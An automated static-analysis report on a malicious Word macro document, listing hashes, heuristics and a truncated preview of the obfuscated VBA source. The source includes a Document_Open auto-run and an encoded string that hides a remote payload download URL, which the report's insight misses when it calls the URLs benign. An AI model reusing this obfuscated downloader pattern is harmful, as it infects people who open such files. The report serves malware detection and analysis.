Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b3802551732d5a57…

MALICIOUS

Office (OLE)

91.5 KB Created: 2016-05-29 23:55:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 396dbaa4ffcea21bf1705baff4b7a1af SHA-1: 7ea85b7704b4636b398189fe5a3a5832c3442c83 SHA-256: b3802551732d5a57ae441e996ce1a886324d64a9fef8831bac4128fa72a3d540
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The Document_Open macro, together with the high-severity heuristics for CreateObject and CallByName, indicates that the VBA code is designed to run automatically when the document is opened. Because the VBA script is obfuscated, its exact function cannot be determined in detail, but it is highly probable that it attempts to download and execute a secondary payload. The extracted URLs are benign (standard Office schema namespaces) and do not provide further clues.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This detects macro documents whose code exists only as p-code, or whose source could not be extracted, so that no visible source is available.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14718 bytes
SHA-256: 6c4846d8598ef1f82849473010bc29d96a31053ca81d94dd39b7770633e27071
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function fvKAaq(ByVal RjHAYZ As String, ByVal plZMuVXW As String) As Integer
CIkPvETJFUk
JWAJBH = 6891
JFWxcIjPC 4165
jqPQzD 7578, "ytiGjsd6ekKE"
If GDiCp Then
TGmhFfRyvckn "KPKE2HeClOLt", True, "HRt68o9ZNQ"
JhNaBG "AMfRcApjwJrG0bt", True
NQRybJUhZKprF
Else
lFuWfXpMg 1146
End If
fvKAaq = 5291
End Function
Private Sub OicfHgZKVWVjfS(ByVal ROjtSfe As String, ByVal zojJPqZNmTLS As Integer)
wjOhKnl "iBqpXyVXVHZaR7y", 5222, True
sQZNJVCfHZN
naHcc 7063
End Sub
Private Function RaRKlSjcuok() As String
If VlDpzxjXRiD Then
ZIyxebwODKgm
Else
aeDGRAWOKLFzkM 2523
End If
RaRKlSjcuok = "TTwrJXZ1Y4"
End Function
Private Sub Document_Open()
Dim aOwVHlBlpxax As String
AtovKyQBvllrVa = 5132
iurSDPGCtkdXP.ONzArApHFkICm
End Sub
Private Function LhplDdFLj(ByVal SqtOT As Integer, ByVal BSRdtj As String) As Boolean
AOYJU 564, 1218, "SlRtSQMod8yKy"
JnHbvIhGtMNp = 5855
CRTrffoKEvF 1901, "CrLjGfjfnt"
roQQLb 7473
AHDmJRufY 238, "ewqCg0U9eI46", "uVr1BazvfhaP"
LhplDdFLj = False
End Function

Attribute VB_Name = "iurSDPGCtkdXP"
Private Sub enIVozeeGiem()
Dim jKPQSEuutha As Integer
IsQDtkacJsON = 7110
iJueTzjdd ejtrxReBIBUyR.ZtFAYECi, 1503, tMMYmHU
ejtrxReBIBUyR.MnHBqswijt ejtrxReBIBUyR.ZtFAYECi
End Sub
Public Sub ONzArApHFkICm()
oucjzcinmWTVGi = 4891
On Error GoTo GIEifT
IpEfKV.sgRKorfj
IpEfKV.NwXpZWHfDnf
enIVozeeGiem
Exit Sub
GIEifT:
End Sub
Private Sub iJueTzjdd(ByVal dbhXZ As String, ByVal CaDod As Integer, ByVal GPbwXSXU As String)
Dim qCKszCQwGnH As Integer
Set uSunG = pGwrUXKyr.IKIuG("2g9c1xwaIKK", GPbwXSXU, "fS4dLFhwjQc3")
pGwrUXKyr.zFeXXjpDotNa uSunG, qPKtf.LjgMgzvQpOMhN("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
ejtrxReBIBUyR.unvIXAYLSYMLu dbhXZ, uQHXwgmR.PiVneV(uSunG, qPKtf.LjgMgzvQpOMhN("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function YKvUmnO(ByVal kOehqnhaZspbkF As String, ByVal GxFzAhlNIxn As String) As Object
Dim IniMFqJthap As String
Dim qYToCbBHhTlJs As String
Set YKvUmnO = tgaCE(CreateObject(GxFzAhlNIxn), False, False)
End Function
Private Function tgaCE(ByVal JHplXpXB As Object, ByVal gvzTxyb As Boolean, ByVal lcwvfCmNuqeIxb As Boolean) As Object
Set tgaCE = JHplXpXB
End Function
Private Function tMMYmHU() As String
tMMYmHU = qPKtf.LjgMgzvQpOMhN("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function

Attribute VB_Name = "qPKtf"
Public Function LjgMgzvQpOMhN(ByVal fqtdUgRdJ As String, ByVal rAVKHfdcXpQ As String) As String
Dim YFCNPGqz As Boolean
For TgYIwO = HcjLBkiEARGkcz To etdjJMlUgCJJp.ypTiE("JiZetYgNzqIM", fqtdUgRdJ)
LjgMgzvQpOMhN = etdjJMlUgCJJp.juNGoc("MT7mNDYhCPs9", LjgMgzvQpOMhN, 8054, ERNBjA(rAVKHfdcXpQ, etdjJMlUgCJJp.LpaKnDK(TgYIwO, "jQRmVT0yjlnJ5vB", fqtdUgRdJ)))
Next
End Function
Private Sub tKyFLY(ByVal tgAspzOCCPRc As Boolean)
YeOUSKbjsQSeHv = "LmzuBVC6d"
uMlYtSUHd 4633, "qRTudaFcn"
cdMOlSvIwbZ "jelylouIu", "SqZR0uDkvu9k0As", "7PbaXEF5x"
rFqbKCDfWQTRCa = False
CryJBQjzIjjAL "E8gfTrZgIm1un7"
gfBXxUaJWrIf 7882
cGOKdTFyCZjE = 779
NscRhRyJBDv
End Sub
Private Sub biLps()
If xjhEYtWTu Then
ByxHwGYit
MoFuIxgPJ = "2Xr8Zmcrck6L"
End If
End Sub
Private Function ERNBjA(ByVal JqwChEMzvTVegT As String, ByVal HXsgjVgtmR As String) As String
Dim ioylxn As Integer
Dim fiPHulhgAVDg As String
If Not etdjJMlUgCJJp.yqhjXuyPzPe(HXsgjVgtmR, "eGPQegGkvXuCkf", JqwChEMzvTVegT, 4638) Then
ERNBjA = HXsgjVgtmR
End If
End Function
Private Function HcjLBkiEARGkcz() As Integer
LTleDTcEW = "YRiN3zRorJJqyMb"
HcjLBkiEARGkcz = 1
End Function

Attribute VB_Name = "pGwrUXKyr"
Private Function VJwqlnCkCZsZ() As String
FaVDWvMiFb
uCKxyjpW "HsmZfMX2tfHRJ", "Toaxo3tHExKrkJ", 1389
LCjkyELUitfwTn
qWyHYZHtbegHJD 2198, 3506, 5073
JYBeU
VJwqlnCkCZsZ = "ay2916dWNOdif52"
... (truncated)